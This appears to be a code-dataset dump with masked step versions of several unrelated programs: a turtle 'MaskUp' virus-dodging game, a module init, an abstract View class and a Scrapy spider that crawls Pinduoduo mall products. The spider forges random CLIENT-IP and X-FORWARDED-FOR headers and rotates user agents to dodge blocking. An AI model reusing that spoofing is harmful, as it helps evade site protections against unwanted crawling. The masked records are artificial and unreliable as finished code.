VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!'\n .format(score), align='center', font=font)\n\n def go_left():\n player.direction = 'left'\n\n def go_right():\n player.direction = 'right'\n\n def stop_player():\n player.direction = 'stop'\n wn.listen()\n wn.onkeypress(go_left, 'Left')\n wn.onkeyrelease(stop_player, 'Left')\n wn.onkeypress(go_right, 'Right')\n wn.onkeyrelease(stop_player, 'Right')\n while True:\n wn.update()\n if player.direction == 'left':\n x = player.xcor()\n if x > -365:\n x -= 0.8\n player.setx(x)\n if player.direction == 'right':\n x = player.xcor()\n if x < 365:\n x += 0.8\n player.setx(x)\n for good_guy in good_guys:\n y = good_guy.ycor()\n y -= good_guy.speed\n good_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n if good_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n score += 10\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('video_game_retro_8bit_coin', winsound.\n SND_FILENAME)\n for bad_guy in bad_guys:\n y = bad_guy.ycor()\n y -= bad_guy.speed\n bad_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n if bad_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n score -= 10\n lives -= 1\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n 
winsound.PlaySound('arcade_game_alarm_short', winsound.\n SND_FILENAME)\n if lives <= 0:\n pen.clear()\n bad_guy.clear()\n good_guy.clear()\n show_message(score)\n winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)\n break\n\n\nwhile True:\n wn.update()\n wn.bgpic('retro_city.gif')\n winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)\n game_loop()\n turtle.Screen().clear()\n wn = turtle.Screen()\n wn.title('MaskUp')\n wn.bgcolor('green')\n wn.bgpic('retro_city_title_page.gif')\n wn.setup(width=800, height=600)\n wn.tracer(0)\nwn.mainloop()\n", "step-5": "\r\nimport turtle\r\nimport random\r\nimport winsound\r\nimport sys\r\n\r\n\r\n\r\n\"\"\" new_game = False\r\n\r\ndef toggle_new_game():\r\n global new_game\r\n if new_game == False:\r\n new_game = True\r\n else:\r\n new_game = False \"\"\"\r\n\r\nwn = turtle.Screen()\r\nwn.title(\"MaskUp\")\r\nwn.bgcolor(\"green\")\r\nwn.bgpic(\"retro_city_title_page.gif\")\r\nwn.setup(width=800, height=600)\r\nwn.tracer(0)\r\nwn.register_shape(\"human.gif\")\r\n\r\n\r\ndef game_loop():\r\n score = 0\r\n lives = 3\r\n\r\n wn.register_shape(\"human.gif\")\r\n wn.register_shape(\"Evil-Virus.gif\")\r\n wn.register_shape(\"surgical-mask.gif\")\r\n\r\n # Add the player\r\n player = turtle.Turtle()\r\n player.speed(0)\r\n player.shape(\"human.gif\")\r\n player.color(\"white\")\r\n player.penup()\r\n player.goto(0, -250)\r\n player.direction = \"stop\"\r\n\r\n\r\n # Create a list of good guys\r\n good_guys = []\r\n\r\n # Add the good_guys\r\n for _ in range(3):\r\n good_guy = turtle.Turtle()\r\n good_guy.speed(0)\r\n good_guy.shape(\"surgical-mask.gif\")\r\n good_guy.color(\"blue\")\r\n good_guy.penup()\r\n good_guy.goto(-100, 250)\r\n good_guy.speed = random.uniform(0.3, 2.0)\r\n good_guys.append(good_guy)\r\n\r\n # Create a list of bad guys\r\n bad_guys = []\r\n\r\n # Add the bad_guys\r\n for _ in range(5):\r\n bad_guy = turtle.Turtle()\r\n bad_guy.speed(0)\r\n bad_guy.shape(\"Evil-Virus.gif\")\r\n bad_guy.color(\"red\")\r\n bad_guy.penup()\r\n bad_guy.goto(100, 250)\r\n bad_guy.speed = random.uniform(0.3, 1.0)\r\n bad_guys.append(bad_guy)\r\n\r\n \r\n # Make the pen\r\n pen = turtle.Turtle()\r\n pen.hideturtle()\r\n pen.speed(0)\r\n pen.shape(\"square\")\r\n pen.color(\"white\")\r\n pen.penup()\r\n pen.goto(0, 260)\r\n font = (\"Courier\", 24, \"normal\")\r\n pen.write(\"Score: {} Lives: {}\".format(score, lives), align=\"center\", font=font)\r\n\r\n # Make the message\r\n def show_message(score):\r\n message = turtle.Turtle()\r\n message.hideturtle()\r\n message.speed(0)\r\n message.color(\"yellow\")\r\n message.penup()\r\n message.goto(0, 0)\r\n font = (\"Calibri\", 24, \"bold\")\r\n message.write(\"GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!\".format(score), align=\"center\", font=font) \r\n\r\n # Functions\r\n def go_left():\r\n player.direction = \"left\"\r\n\r\n def go_right():\r\n player.direction = \"right\"\r\n\r\n def stop_player():\r\n player.direction = \"stop\"\r\n\r\n # Keyboard Binding\r\n wn.listen()\r\n wn.onkeypress(go_left, \"Left\")\r\n wn.onkeyrelease(stop_player, \"Left\")\r\n wn.onkeypress(go_right, \"Right\")\r\n wn.onkeyrelease(stop_player, \"Right\")\r\n\r\n\r\n \r\n while True:\r\n # Update screen\r\n wn.update()\r\n\r\n # Move the player\r\n if player.direction == \"left\":\r\n x = player.xcor()\r\n if x > -365:\r\n x -= 0.8\r\n player.setx(x)\r\n \r\n if player.direction == \"right\":\r\n x = player.xcor()\r\n if x < 365:\r\n x += 0.8\r\n player.setx(x)\r\n\r\n # Move 
the good guys\r\n for good_guy in good_guys:\r\n y = good_guy.ycor()\r\n y -= good_guy.speed\r\n good_guy.sety(y)\r\n\r\n # Check if off the screen\r\n if y < -300:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n good_guy.goto(x, y)\r\n\r\n # Check for a collision with player\r\n if good_guy.distance(player) < 40:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n good_guy.goto(x, y)\r\n score += 10\r\n pen.clear()\r\n pen.write(\"Score: {} Lives: {}\".format(score, lives), align=\"center\", font=font)\r\n winsound.PlaySound(\"video_game_retro_8bit_coin\", winsound.SND_FILENAME)\r\n \r\n # Move the bad guys\r\n for bad_guy in bad_guys:\r\n y = bad_guy.ycor()\r\n y -= bad_guy.speed\r\n bad_guy.sety(y)\r\n\r\n # Check if off the screen\r\n if y < -300:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n bad_guy.goto(x, y)\r\n\r\n # Check for a collision with player\r\n if bad_guy.distance(player) < 40:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n bad_guy.goto(x, y)\r\n score -= 10\r\n lives -= 1\r\n pen.clear()\r\n pen.write(\"Score: {} Lives: {}\".format(score, lives), align=\"center\", font=font)\r\n winsound.PlaySound(\"arcade_game_alarm_short\", winsound.SND_FILENAME)\r\n\r\n if lives <= 0:\r\n pen.clear()\r\n bad_guy.clear()\r\n good_guy.clear()\r\n show_message(score)\r\n winsound.PlaySound(\"game_over_sound\", winsound.SND_FILENAME)\r\n # wn.listen()\r\n # if wn.onkeypress(toggle_new_game, \"a\"):\r\n # if new_game == True:\r\n break\r\n # wn.onkeypress(sys.exit(), \"q\")\r\n\r\nwhile True:\r\n # Update screen\r\n wn.update()\r\n\r\n # Play music\r\n wn.bgpic(\"retro_city.gif\")\r\n winsound.PlaySound(\"retro_video_game_music-trimmed\", winsound.SND_LOOP)\r\n game_loop()\r\n turtle.Screen().clear()\r\n \r\n wn = turtle.Screen()\r\n wn.title(\"MaskUp\")\r\n wn.bgcolor(\"green\")\r\n wn.bgpic(\"retro_city_title_page.gif\")\r\n wn.setup(width=800, height=600)\r\n wn.tracer(0)\r\n\r\n #sys.exit()\r\n \r\n \r\n \r\n \r\n\r\n\r\nwn.mainloop()", "step-ids": [ 0, 2, 3, 4, 5 ] }
[ 0, 2, 3, 4, 5 ]
import wizard
import report
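These two imports are the whole __init__.py of an OpenERP 6-style module pulling in its wizard/ and report/ subpackages. Such a module normally ships a manifest alongside it; the sketch below is a generic __openerp__.py with placeholder values only, not recovered from this repository.

# Hypothetical __openerp__.py manifest; every value is a placeholder.
{
    'name': 'Example Module',
    'version': '1.0',
    'depends': ['base'],
    'init_xml': [],
    'update_xml': [],
    'installable': True,
}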
normal
{ "blob_id": "9d07fd14825ed1e0210fa1f404939f68a3bb039c", "index": 4762, "step-1": "<mask token>\n", "step-2": "import wizard\nimport report\n", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
from abc import ABC, abstractmethod
from raspberry_home.view.geometry import *
from raspberry_home.view.renderable import Renderable


class View(Renderable, ABC):

    @abstractmethod
    def content_size(self, container_size: Size) -> Size:
        pass
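A concrete view only has to supply content_size; the subclass below is a hypothetical illustration (FixedSizeView is not part of raspberry_home), and it assumes any abstract members Renderable itself declares are implemented elsewhere before instantiation.

# Hypothetical concrete subclass: always reports the same size,
# ignoring whatever room the container offers.
class FixedSizeView(View):
    def __init__(self, size: Size):
        self.size = size

    def content_size(self, container_size: Size) -> Size:
        return self.size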
normal
{ "blob_id": "913ff9b811d3abbe43bda0554e40a6a2c87053be", "index": 4449, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass View(Renderable, ABC):\n <mask token>\n", "step-3": "<mask token>\n\n\nclass View(Renderable, ABC):\n\n @abstractmethod\n def content_size(self, container_size: Size) ->Size:\n pass\n", "step-4": "from abc import ABC, abstractmethod\nfrom raspberry_home.view.geometry import *\nfrom raspberry_home.view.renderable import Renderable\n\n\nclass View(Renderable, ABC):\n\n @abstractmethod\n def content_size(self, container_size: Size) ->Size:\n pass\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# -*- coding: utf-8 -*-
import scrapy
import json, time, sys, random, re, pyssdb

from scrapy.utils.project import get_project_settings

from spider.items import GoodsSalesItem

goods_list = []
'''Fetch the products of each mall (store)'''
class PddMallGoodsSpider(scrapy.Spider):
	name = 'pdd_mall_goods'
	mall_id_hash 	= 'pdd_mall_id_hash'
	hash_num 		= 0
	ssdb_client = ''
	process_nums 	= 1
	limit			= 100

	def __init__(self, hash_num = 0, process_nums = 1):
		self.ssdb_client = pyssdb.Client(get_project_settings().get('SSDB_HOST'), 8888)
		self.hash_num = int(hash_num) ##index of this worker
		self.process_nums = int(process_nums) ##total number of workers
		self.pageSize = 500 ##products fetched per request; the API returns at most 500

	def start_requests(self):
		mall_nums 		= 	self.limit * int(self.process_nums) ##mall ids per SSDB query

		is_end 			=	False
		start_mall_id 	=	'' ##mall key to start the scan from
		while not is_end:
			mall_ids 	=	self.ssdb_client.hkeys(self.mall_id_hash, start_mall_id, '', mall_nums)

			if not mall_ids: ##no more data
				is_end 	=	True
				continue

			for mall_id in mall_ids:
				mall_id = int( mall_id.decode('utf-8') )
				start_mall_id = mall_id

				if mall_id % self.process_nums != self.hash_num:
					continue

				goods_list=[]
				page = 1

				headers = self.make_headers()
				url = 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='+str(mall_id)+'&page_no='+str(page)+'&page_size=500'
				meta = {'page':page, 'mall_id':mall_id, 'goods_list':goods_list}
				yield scrapy.Request(url, meta=meta, callback=self.parse, headers=headers)

	def parse(self, response):
		goods_list=response.meta['goods_list'] ##accumulated products
		mall_id = response.meta['mall_id'] ##mall id
		page 	 = response.meta['page'] ##current page number

		mall_goods = response.body.decode('utf-8') ##bytes to str
		mall_goods = json.loads(mall_goods)

		goods_len = len(mall_goods['goods_list'])

		if goods_len > 0:
			goods_list = goods_list + mall_goods['goods_list'] ##merge the product lists

		if goods_len > self.pageSize - 100:
			page += 1
			##keep crawling the next page
			url = 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='+str(mall_id)+'&page_no='+str(page)+'&page_size=500'
			meta = {'page':page, 'mall_id':mall_id, 'goods_list':goods_list}
			headers = self.make_headers()
			yield scrapy.Request(url, meta=meta, callback=self.parse, headers=headers)
		else:
			if goods_list:
				item = GoodsSalesItem()
				item['goods_list'] = goods_list
				item['mall_id'] = mall_id
				yield item

	'''Build request headers'''
	def make_headers(self):
		chrome_version = str(random.randint(59,63))+'.0.'+str(random.randint(1000,3200))+'.94'
		headers = {
			"Host":"yangkeduo.com",
			"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
			"Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8",
			"Accept-Encoding":"gzip, deflate",
			"Referer":"http://yangkeduo.com/goods.html?goods_id=442573047&from_subject_id=935&is_spike=0&refer_page_name=subject&refer_page_id=subject_1515726808272_1M143fWqjQ&refer_page_sn=10026",
			"Connection":"keep-alive",
			'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'+chrome_version+' Safari/537.36',
		}

		ip = str(random.randint(100, 200))+'.'+str(random.randint(1, 255))+'.'+str(random.randint(1, 255))+'.'+str(random.randint(1, 255))
		headers['CLIENT-IP'] 	=	ip
		headers['X-FORWARDED-FOR']=	ip
		return headers
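hash_num and process_nums shard the SSDB mall hash modulo the worker count, so each mall id is crawled by exactly one process. A plausible four-worker launch for shard 0, equivalent to running `scrapy crawl pdd_mall_goods -a hash_num=0 -a process_nums=4` from the project directory, is sketched below.

# Plausible launch of worker 0 of 4 via Scrapy's cmdline helper;
# start one process per hash_num value from 0 to process_nums - 1.
from scrapy.cmdline import execute

execute(['scrapy', 'crawl', 'pdd_mall_goods',
         '-a', 'hash_num=0', '-a', 'process_nums=4'])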
normal
{ "blob_id": "f33190df35a6b0b91c4dd2d6a58291451d06e29a", "index": 3529, "step-1": "<mask token>\n\n\nclass PddMallGoodsSpider(scrapy.Spider):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def start_requests(self):\n mall_nums = self.limit * int(self.process_nums)\n is_end = False\n start_mall_id = ''\n while not is_end:\n mall_ids = self.ssdb_client.hkeys(self.mall_id_hash,\n start_mall_id, '', mall_nums)\n if not mall_ids:\n is_end = True\n continue\n for mall_id in mall_ids:\n mall_id = int(mall_id.decode('utf-8'))\n start_mall_id = mall_id\n if mall_id % self.process_nums != self.hash_num:\n continue\n goods_list = []\n page = 1\n headers = self.make_headers()\n url = (\n 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='\n + str(mall_id) + '&page_no=' + str(page) +\n '&page_size=500')\n meta = {'page': page, 'mall_id': mall_id, 'goods_list':\n goods_list}\n yield scrapy.Request(url, meta=meta, callback=self.parse,\n headers=headers)\n <mask token>\n <mask token>\n\n def make_headers(self):\n chrome_version = str(random.randint(59, 63)) + '.0.' + str(random.\n randint(1000, 3200)) + '.94'\n headers = {'Host': 'yangkeduo.com', 'Accept':\n 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'\n , 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Accept-Encoding': 'gzip, deflate', 'Host': 'yangkeduo.com',\n 'Referer':\n 'http://yangkeduo.com/goods.html?goods_id=442573047&from_subject_id=935&is_spike=0&refer_page_name=subject&refer_page_id=subject_1515726808272_1M143fWqjQ&refer_page_sn=10026'\n , 'Connection': 'keep-alive', 'User-Agent': \n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'\n + chrome_version + ' Safari/537.36'}\n ip = str(random.randint(100, 200)) + '.' + str(random.randint(1, 255)\n ) + '.' + str(random.randint(1, 255)) + '.' + str(random.\n randint(1, 255))\n headers['CLIENT-IP'] = ip\n headers['X-FORWARDED-FOR'] = ip\n return headers\n", "step-2": "<mask token>\n\n\nclass PddMallGoodsSpider(scrapy.Spider):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, hash_num=0, process_nums=1):\n self.ssdb_client = pyssdb.Client(get_project_settings().get(\n 'SSDB_HOST'), 8888)\n self.hash_num = int(hash_num)\n self.process_nums = int(process_nums)\n self.pageSize = 500\n\n def start_requests(self):\n mall_nums = self.limit * int(self.process_nums)\n is_end = False\n start_mall_id = ''\n while not is_end:\n mall_ids = self.ssdb_client.hkeys(self.mall_id_hash,\n start_mall_id, '', mall_nums)\n if not mall_ids:\n is_end = True\n continue\n for mall_id in mall_ids:\n mall_id = int(mall_id.decode('utf-8'))\n start_mall_id = mall_id\n if mall_id % self.process_nums != self.hash_num:\n continue\n goods_list = []\n page = 1\n headers = self.make_headers()\n url = (\n 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='\n + str(mall_id) + '&page_no=' + str(page) +\n '&page_size=500')\n meta = {'page': page, 'mall_id': mall_id, 'goods_list':\n goods_list}\n yield scrapy.Request(url, meta=meta, callback=self.parse,\n headers=headers)\n <mask token>\n <mask token>\n\n def make_headers(self):\n chrome_version = str(random.randint(59, 63)) + '.0.' 
+ str(random.\n randint(1000, 3200)) + '.94'\n headers = {'Host': 'yangkeduo.com', 'Accept':\n 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'\n , 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Accept-Encoding': 'gzip, deflate', 'Host': 'yangkeduo.com',\n 'Referer':\n 'http://yangkeduo.com/goods.html?goods_id=442573047&from_subject_id=935&is_spike=0&refer_page_name=subject&refer_page_id=subject_1515726808272_1M143fWqjQ&refer_page_sn=10026'\n , 'Connection': 'keep-alive', 'User-Agent': \n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'\n + chrome_version + ' Safari/537.36'}\n ip = str(random.randint(100, 200)) + '.' + str(random.randint(1, 255)\n ) + '.' + str(random.randint(1, 255)) + '.' + str(random.\n randint(1, 255))\n headers['CLIENT-IP'] = ip\n headers['X-FORWARDED-FOR'] = ip\n return headers\n", "step-3": "<mask token>\n\n\nclass PddMallGoodsSpider(scrapy.Spider):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, hash_num=0, process_nums=1):\n self.ssdb_client = pyssdb.Client(get_project_settings().get(\n 'SSDB_HOST'), 8888)\n self.hash_num = int(hash_num)\n self.process_nums = int(process_nums)\n self.pageSize = 500\n\n def start_requests(self):\n mall_nums = self.limit * int(self.process_nums)\n is_end = False\n start_mall_id = ''\n while not is_end:\n mall_ids = self.ssdb_client.hkeys(self.mall_id_hash,\n start_mall_id, '', mall_nums)\n if not mall_ids:\n is_end = True\n continue\n for mall_id in mall_ids:\n mall_id = int(mall_id.decode('utf-8'))\n start_mall_id = mall_id\n if mall_id % self.process_nums != self.hash_num:\n continue\n goods_list = []\n page = 1\n headers = self.make_headers()\n url = (\n 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='\n + str(mall_id) + '&page_no=' + str(page) +\n '&page_size=500')\n meta = {'page': page, 'mall_id': mall_id, 'goods_list':\n goods_list}\n yield scrapy.Request(url, meta=meta, callback=self.parse,\n headers=headers)\n\n def parse(self, response):\n pass\n goods_list = response.meta['goods_list']\n mall_id = response.meta['mall_id']\n page = response.meta['page']\n mall_goods = response.body.decode('utf-8')\n mall_goods = json.loads(mall_goods)\n goods_len = len(mall_goods['goods_list'])\n if goods_len > 0:\n goods_list = goods_list + mall_goods['goods_list']\n if goods_len > self.pageSize - 100:\n page += 1\n url = (\n 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='\n + str(mall_id) + '&page_no=' + str(page) + '&page_size=500')\n meta = {'page': page, 'mall_id': mall_id, 'goods_list': goods_list}\n headers = self.make_headers()\n yield scrapy.Request(url, meta=meta, callback=self.parse,\n headers=headers)\n elif goods_list:\n item = GoodsSalesItem()\n item['goods_list'] = goods_list\n item['mall_id'] = mall_id\n yield item\n <mask token>\n\n def make_headers(self):\n chrome_version = str(random.randint(59, 63)) + '.0.' 
+ str(random.\n randint(1000, 3200)) + '.94'\n headers = {'Host': 'yangkeduo.com', 'Accept':\n 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'\n , 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Accept-Encoding': 'gzip, deflate', 'Host': 'yangkeduo.com',\n 'Referer':\n 'http://yangkeduo.com/goods.html?goods_id=442573047&from_subject_id=935&is_spike=0&refer_page_name=subject&refer_page_id=subject_1515726808272_1M143fWqjQ&refer_page_sn=10026'\n , 'Connection': 'keep-alive', 'User-Agent': \n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'\n + chrome_version + ' Safari/537.36'}\n ip = str(random.randint(100, 200)) + '.' + str(random.randint(1, 255)\n ) + '.' + str(random.randint(1, 255)) + '.' + str(random.\n randint(1, 255))\n headers['CLIENT-IP'] = ip\n headers['X-FORWARDED-FOR'] = ip\n return headers\n", "step-4": "import scrapy\nimport json, time, sys, random, re, pyssdb\nfrom scrapy.utils.project import get_project_settings\nfrom spider.items import GoodsSalesItem\ngoods_list = []\n<mask token>\n\n\nclass PddMallGoodsSpider(scrapy.Spider):\n name = 'pdd_mall_goods'\n mall_id_hash = 'pdd_mall_id_hash'\n hash_num = 0\n ssdb_client = ''\n process_nums = 1\n limit = 100\n\n def __init__(self, hash_num=0, process_nums=1):\n self.ssdb_client = pyssdb.Client(get_project_settings().get(\n 'SSDB_HOST'), 8888)\n self.hash_num = int(hash_num)\n self.process_nums = int(process_nums)\n self.pageSize = 500\n\n def start_requests(self):\n mall_nums = self.limit * int(self.process_nums)\n is_end = False\n start_mall_id = ''\n while not is_end:\n mall_ids = self.ssdb_client.hkeys(self.mall_id_hash,\n start_mall_id, '', mall_nums)\n if not mall_ids:\n is_end = True\n continue\n for mall_id in mall_ids:\n mall_id = int(mall_id.decode('utf-8'))\n start_mall_id = mall_id\n if mall_id % self.process_nums != self.hash_num:\n continue\n goods_list = []\n page = 1\n headers = self.make_headers()\n url = (\n 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='\n + str(mall_id) + '&page_no=' + str(page) +\n '&page_size=500')\n meta = {'page': page, 'mall_id': mall_id, 'goods_list':\n goods_list}\n yield scrapy.Request(url, meta=meta, callback=self.parse,\n headers=headers)\n\n def parse(self, response):\n pass\n goods_list = response.meta['goods_list']\n mall_id = response.meta['mall_id']\n page = response.meta['page']\n mall_goods = response.body.decode('utf-8')\n mall_goods = json.loads(mall_goods)\n goods_len = len(mall_goods['goods_list'])\n if goods_len > 0:\n goods_list = goods_list + mall_goods['goods_list']\n if goods_len > self.pageSize - 100:\n page += 1\n url = (\n 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='\n + str(mall_id) + '&page_no=' + str(page) + '&page_size=500')\n meta = {'page': page, 'mall_id': mall_id, 'goods_list': goods_list}\n headers = self.make_headers()\n yield scrapy.Request(url, meta=meta, callback=self.parse,\n headers=headers)\n elif goods_list:\n item = GoodsSalesItem()\n item['goods_list'] = goods_list\n item['mall_id'] = mall_id\n yield item\n \"\"\"生成headers头信息\"\"\"\n\n def make_headers(self):\n chrome_version = str(random.randint(59, 63)) + '.0.' 
+ str(random.\n randint(1000, 3200)) + '.94'\n headers = {'Host': 'yangkeduo.com', 'Accept':\n 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'\n , 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Accept-Encoding': 'gzip, deflate', 'Host': 'yangkeduo.com',\n 'Referer':\n 'http://yangkeduo.com/goods.html?goods_id=442573047&from_subject_id=935&is_spike=0&refer_page_name=subject&refer_page_id=subject_1515726808272_1M143fWqjQ&refer_page_sn=10026'\n , 'Connection': 'keep-alive', 'User-Agent': \n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'\n + chrome_version + ' Safari/537.36'}\n ip = str(random.randint(100, 200)) + '.' + str(random.randint(1, 255)\n ) + '.' + str(random.randint(1, 255)) + '.' + str(random.\n randint(1, 255))\n headers['CLIENT-IP'] = ip\n headers['X-FORWARDED-FOR'] = ip\n return headers\n", "step-5": "# -*- coding: utf-8 -*-\r\nimport scrapy\r\nimport json, time, sys, random, re, pyssdb\r\n\r\nfrom scrapy.utils.project import get_project_settings\r\n\r\nfrom spider.items import GoodsSalesItem\r\n\r\ngoods_list = []\r\n'''获取店铺内产品信息'''\r\nclass PddMallGoodsSpider(scrapy.Spider):\r\n\tname = 'pdd_mall_goods'\r\n\tmall_id_hash \t= 'pdd_mall_id_hash'\r\n\thash_num \t\t= 0\r\n\tssdb_client = ''\r\n\tprocess_nums \t= 1\r\n\tlimit\t\t\t= 100\r\n\r\n\tdef __init__(self, hash_num = 0, process_nums = 1):\r\n\t\tself.ssdb_client = pyssdb.Client(get_project_settings().get('SSDB_HOST'), 8888)\r\n\t\tself.hash_num = int(hash_num) ##当前脚本号\r\n\t\tself.process_nums = int(process_nums) ##脚本总数\r\n\t\tself.pageSize = 500 ##每次抓取的产品数 最大只返回500\r\n\r\n\tdef start_requests(self):\r\n\t\tmall_nums \t\t= \tself.limit * int(self.process_nums) ##一次查询的数量\r\n\r\n\t\tis_end \t\t\t=\tFalse\r\n\t\tstart_mall_id \t=\t'' ##起始查询的店铺key\r\n\t\twhile not is_end:\r\n\t\t\tmall_ids \t=\tself.ssdb_client.hkeys(self.mall_id_hash, start_mall_id, '', mall_nums)\r\n\t\t\t\r\n\t\t\tif not mall_ids: ##没有数据返回\r\n\t\t\t\tis_end \t=\tTrue\r\n\t\t\t\tcontinue\r\n\r\n\t\t\tfor mall_id in mall_ids:\r\n\t\t\t\tmall_id = int( mall_id.decode('utf-8') )\r\n\t\t\t\tstart_mall_id = mall_id\r\n\r\n\t\t\t\tif mall_id % self.process_nums != self.hash_num:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\t\t\r\n\t\t\t\tgoods_list=[]\r\n\t\t\t\tpage = 1\r\n\r\n\t\t\t\theaders = self.make_headers()\r\n\t\t\t\turl = 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='+str(mall_id)+'&page_no='+str(page)+'&page_size=500'\r\n\t\t\t\tmeta = {'page':page, 'mall_id':mall_id, 'goods_list':goods_list}\r\n\t\t\t\tyield scrapy.Request(url, meta=meta, callback=self.parse, headers=headers)\r\n\t\t\t\r\n\tdef parse(self, response):\r\n\t\tpass\r\n\t\tgoods_list=response.meta['goods_list'] ##产品集合\r\n\t\tmall_id = response.meta['mall_id'] ##店铺ID\r\n\t\tpage \t = response.meta['page'] ##每返回一次页面数据 记录页数\r\n\r\n\t\tmall_goods = response.body.decode('utf-8') ##bytes转换为str\r\n\t\tmall_goods = json.loads(mall_goods)\r\n\r\n\t\tgoods_len = len(mall_goods['goods_list'])\r\n\r\n\t\tif goods_len > 0:\r\n\t\t\tgoods_list = goods_list + mall_goods['goods_list'] ##合并产品列表\r\n\r\n\t\tif goods_len > self.pageSize - 100:\r\n\t\t\tpage += 1\r\n\t\t\t##继续采集下一页面\r\n\t\t\turl = 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='+str(mall_id)+'&page_no='+str(page)+'&page_size=500'\r\n\t\t\tmeta = {'page':page, 'mall_id':mall_id, 'goods_list':goods_list}\r\n\t\t\theaders = self.make_headers()\r\n\t\t\tyield 
scrapy.Request(url, meta=meta, callback=self.parse, headers=headers)\r\n\t\telse:\r\n\t\t\tif goods_list:\r\n\t\t\t\titem = GoodsSalesItem()\r\n\t\t\t\titem['goods_list'] = goods_list\r\n\t\t\t\titem['mall_id'] = mall_id\r\n\t\t\t\tyield item\r\n\r\n\t'''生成headers头信息'''\r\n\tdef make_headers(self):\r\n\t\tchrome_version = str(random.randint(59,63))+'.0.'+str(random.randint(1000,3200))+'.94'\r\n\t\theaders = {\r\n\t\t\t\"Host\":\"yangkeduo.com\",\r\n\t\t\t\"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\r\n\t\t\t\"Accept-Language\":\"zh-CN,zh;q=0.9,en;q=0.8\",\r\n\t\t\t\"Accept-Encoding\":\"gzip, deflate\",\r\n\t\t\t\"Host\":\"yangkeduo.com\",\r\n\t\t\t\"Referer\":\"http://yangkeduo.com/goods.html?goods_id=442573047&from_subject_id=935&is_spike=0&refer_page_name=subject&refer_page_id=subject_1515726808272_1M143fWqjQ&refer_page_sn=10026\",\r\n\t\t\t\"Connection\":\"keep-alive\",\r\n\t\t\t'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'+chrome_version+' Safari/537.36',\r\n\t\t}\r\n\t\t\r\n\t\tip = str(random.randint(100, 200))+'.'+str(random.randint(1, 255))+'.'+str(random.randint(1, 255))+'.'+str(random.randint(1, 255))\r\n\t\theaders['CLIENT-IP'] \t=\tip\r\n\t\theaders['X-FORWARDED-FOR']=\tip\r\n\t\treturn headers", "step-ids": [ 3, 4, 5, 9, 10 ] }
[ 3, 4, 5, 9, 10 ]
